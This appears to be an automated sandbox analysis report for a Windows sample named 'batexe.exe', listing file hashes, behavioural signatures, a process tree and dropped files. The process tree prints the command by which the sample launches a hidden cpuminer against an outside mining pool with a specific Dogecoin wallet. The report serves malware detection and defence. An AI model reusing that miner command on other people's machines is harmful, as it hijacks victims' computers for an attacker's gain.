Analysis
-
max time kernel
301s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
23/02/2024, 17:46
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 3100 b2e.exe 3552 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3552 cpuminer-sse2.exe 3552 cpuminer-sse2.exe 3552 cpuminer-sse2.exe 3552 cpuminer-sse2.exe 3552 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3916-18-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3916 wrote to memory of 3100 3916 batexe.exe 93 PID 3916 wrote to memory of 3100 3916 batexe.exe 93 PID 3916 wrote to memory of 3100 3916 batexe.exe 93 PID 3100 wrote to memory of 2320 3100 b2e.exe 94 PID 3100 wrote to memory of 2320 3100 b2e.exe 94 PID 3100 wrote to memory of 2320 3100 b2e.exe 94 PID 2320 wrote to memory of 3552 2320 cmd.exe 97 PID 2320 wrote to memory of 3552 2320 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\4707.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\4707.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4707.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\557E.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3552
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.7MB
MD5d03380c7f456bd9a7b22ed6f2b461602
SHA10a6c45e90f5b1dc5baff26e5f66a96262a104678
SHA2560eae7af010cf58dc7baf6bc31785220566d2e0c14e96a428b89e68119cb10137
SHA512f48a9ae9a46b4325748a0d99bec70e5cee6362d4c3b99507e7317a715357108b82f59fa7568ae5e9ef22e320041753412721c0ccfbd7698caf4323f5ed608071
-
Filesize
4.1MB
MD592f82eefcd7223139c8f5631693aa8ad
SHA1ad1ab00a1afe0b49ba753465bb99e6402f67ed8c
SHA25684ebb1b835e733e0d5ed220e3ce810feba60274503a5e8240eda3cc8c686fdba
SHA512cefaf0d280979ef998113dd905f0832a7443ada4b758bf8b414bf9f9f08921be6346ed5cb4e2ff59254b9bbbb2f0414792664ce1622b460f2d6f44f3614cc594
-
Filesize
2.3MB
MD51f6fbe69b89241b3d19bf26d60df1bbc
SHA1ae8dffc300262490cca2960bf164b79514b56127
SHA25642f812660c84f67b363e3cfd7f4d157af701c10bcd74f6672ec2ec10a5b7fe6f
SHA512362ef31c6a340e20333e1cbb31563a999f55b98c47da9a6e9ac94aab969e602945aa1e544939a1681917340a9fe06c88a310b2dc1a1d8a57edd1dd3640749108
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
292KB
MD531084c2bd6f0f6b3c2dd3478a2704628
SHA10086d33e6a217968d20d1ea5c38275f95705b604
SHA256af0b9e15220acd0d2908e0babae1c5e706d18eae283bddb5b4dfd6f911e978af
SHA5122975805913873717bad76de6f9da71cbc482ef509a7d4bd611aa0688e3b79998a67f7bd97e1cce7d53a7515b19ce841926e1c035a704b9b6639c736ee61b814e
-
Filesize
333KB
MD5d1fd22a87624ac88240fc9a619e34b02
SHA144c0817bf4950bc0a5db8cac5d457dc641d1f632
SHA25624026397970fb677789328b95a44fd62505eb71504ceffc67bb12cf2916a79da
SHA512bb4ada0443dc120007c812e6aecff8234c87b91ba4c65eca772b4b1bcca86846a18f661e2a94b554fac5e0fb2a3b590c6e0b81d1b4fb52b83b421cb48ad8853a
-
Filesize
344KB
MD514e7720ec89a886d3691be8cd896c99d
SHA1519d76408858657be7a0e91244b7deb9bdb9dfa0
SHA256d4496ac3204393571f353e3ddfb231cf214ea31e96dc3c6a26b112779a6c9853
SHA512696fdbf75009a4a8b74a0a5a2683fefec255fb2919265ce3b6808066fe7600e2e029e3f8e69927eae79987b6499e3de968dad06a77835a18c30685f71b300bbd
-
Filesize
239KB
MD5e9c4edad547a910d5ee533701e267cee
SHA1b3efa372059769157e004d4d5a21c3527ec5297d
SHA2561686ac52a361020f4d156cc0ec725139fa87f57858b23deac6250373908dd70c
SHA512b0e528c33ae8c2a070a1a998dabcc1cb1f9f9506b6caf99329df795a51fff29609b8b52ac908862c1c3752a455ba6fde20e8ce5840046185011932a11b1a73c5
-
Filesize
304KB
MD5234e568eb5a6510bfaa04bdb1ed0b4ef
SHA19b2d58877872c7f8e7f9928bf2c75490080001bd
SHA256951a38a2e5dd684482374fbdfc93eeda4aaf8258f6bf2562d7b4fd4f2ab223b7
SHA512b04bb8182a3948b49c67b3cf92f84f6cefffeddd5b6814bd1b7110416a00216fb06ab1155cfc0eb33a7a9dcf98da268ec1b65d00417466d887d039ade77baede
-
Filesize
233KB
MD5e7e5e1cb434c792f2b295ff74f2274a6
SHA107703e97ef272b3ee7f778cff09ed8d8e8df7afc
SHA256eadf9788ab8eb6e30892879fc25fd8f9a59ec4af2c136422c1b0611ff6d2faaf
SHA5125eec971f1fe7cf3bf0d466c859523ea0b2b74bd39bf17fd70b838d3366fe949ef10c8e351e5757449d6577459743a8bda5f7ccf8173d0d027d732d37fde1376a
-
Filesize
444KB
MD5827939f0bcf2e05e56540ef29eee3a0e
SHA198b5aebfc4f72f2fbad4598d94376479e66fa51f
SHA25693af63ca221bb041f3bf87731f8c043c1a5da6d087ebc25bd8f1818a4142f03c
SHA512fbe9debc395ef5105bfdf3a00deb6108ce6d7e2a2f2d3c43c899549c12d2104fde1b4b154029b905f3baab65c5e5dcee252480b0add7e2c9a7bf14782e497f28
-
Filesize
184KB
MD56401745096c73ffa51d3d153754f1041
SHA1a7ef58ea47c00c6f592b088e08d89c7652124e13
SHA25670e0466efd8be0bf2d2cfa84cb488e7eff76491a41ba9bbacb9eaabf4d17c2b5
SHA512aac8766e64e909710b5be18117d817b9f519276deb80ebec255a34c806f961caf3591574e72865ff0a7e27f0a120198f698e71e98c2e77cf5083cf8a99ee0c21
-
Filesize
361KB
MD52fd43d9195b88b38c7d868b21e56d4c8
SHA1493b24015d7ee7375e81dcf6a4606bd468aa1323
SHA2565a6c96153e39bcd6e8c7d4d7cb1ac34422fcd5ba738211d54d7c073c7ff39cbb
SHA5120da10a4ce3770859b3fa7a09f91b0033bd0e53cf0abb8601db4d9b20c5b8297a7e79d078dcca28b324626a825220da435196a936ffa01e7c3a31e170ce334396
-
Filesize
219KB
MD5045ece139689b808ff84ba0ef517e4a7
SHA16ee14e39ffec354dae1ee134020eea8e9c384936
SHA2562ae1ba470dd270dfe02fdba8a2fafb64c7bf94b52cbffe7b76c98b8e6af21cd4
SHA512835a3deef2ba98638115f0da85ad5f23ce0b98e5783357f7dd5a3048ef68e4e02d8412e98764055bdbdbc4be04f51f3f611cda63bde7add7b7533d8055c54c33
-
Filesize
337KB
MD5a5ebbbe479e6147802c72308e1cf3807
SHA167275451739d918ce663d2e2e6d24d311d8aba39
SHA25614d5dcb27f7d7c8fce22c393cd1b8ec5537f3d039884440dd8da4ce183ca0309
SHA512851328f34780cf0626b2d9a11abc17b35f926a1c61d8deff06b661ca8d3aa1e2b23538a518f432f4980178c650c21b5636f18125e3a0bbdef6a19a60613d0938